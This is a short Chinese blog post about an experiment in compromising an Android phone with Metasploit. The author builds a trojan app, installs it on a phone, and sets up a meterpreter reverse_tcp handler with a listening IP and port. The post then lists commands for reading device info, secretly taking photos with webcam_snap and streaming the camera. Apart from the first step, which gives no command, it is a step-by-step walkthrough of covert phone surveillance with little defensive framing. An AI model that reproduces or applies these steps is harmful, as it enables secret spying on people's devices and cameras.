1. 程式人生 > >記一次msfconsole_android滲透實驗

記一次msfconsole_android滲透實驗

1>檢視本機IP

2>生成App木馬

3>將生成的木馬安裝至手機

4>開啟msfconsole

 1,  user exploit/multi/handler  載入模組、

 2, set payload android/meterpreter/reverse_tcp  選擇Payload

 3,show options  檢視引數設定

5>更改設定

  1, set LHOST 192.168.0.102   設定為我們生成木馬的IP地址

  2, set LPORT 4444 設定為生成木馬的監聽埠

  3, exploit   執行漏洞 ,開始監聽

6>建立連線

當app被點選後,會無任何反應(應該會有一條連線記錄的)

但是,我在實驗時,並無效果(後來將app解除安裝時,添加了一條會話)

但是,使用sysinfo檢視手機資訊時:連線超時

於是再次安裝App,允許所有許可權,裝完後點擊開啟,連線被建立

檢視手機資訊:sysinfo

檢視有幾個攝像頭:webcam_list

 

隱祕拍照功能:webcam_snap  // -i 指定那個攝像頭

(在試驗時應用提示授權,授權後可以實現隱祕拍攝)

開啟攝像頭:webcam_stream

 

會開啟一個HTML檔案( 略顯示卡頓)

  最後再來一張網路上的圖:

————————————————————————end——————————————————————————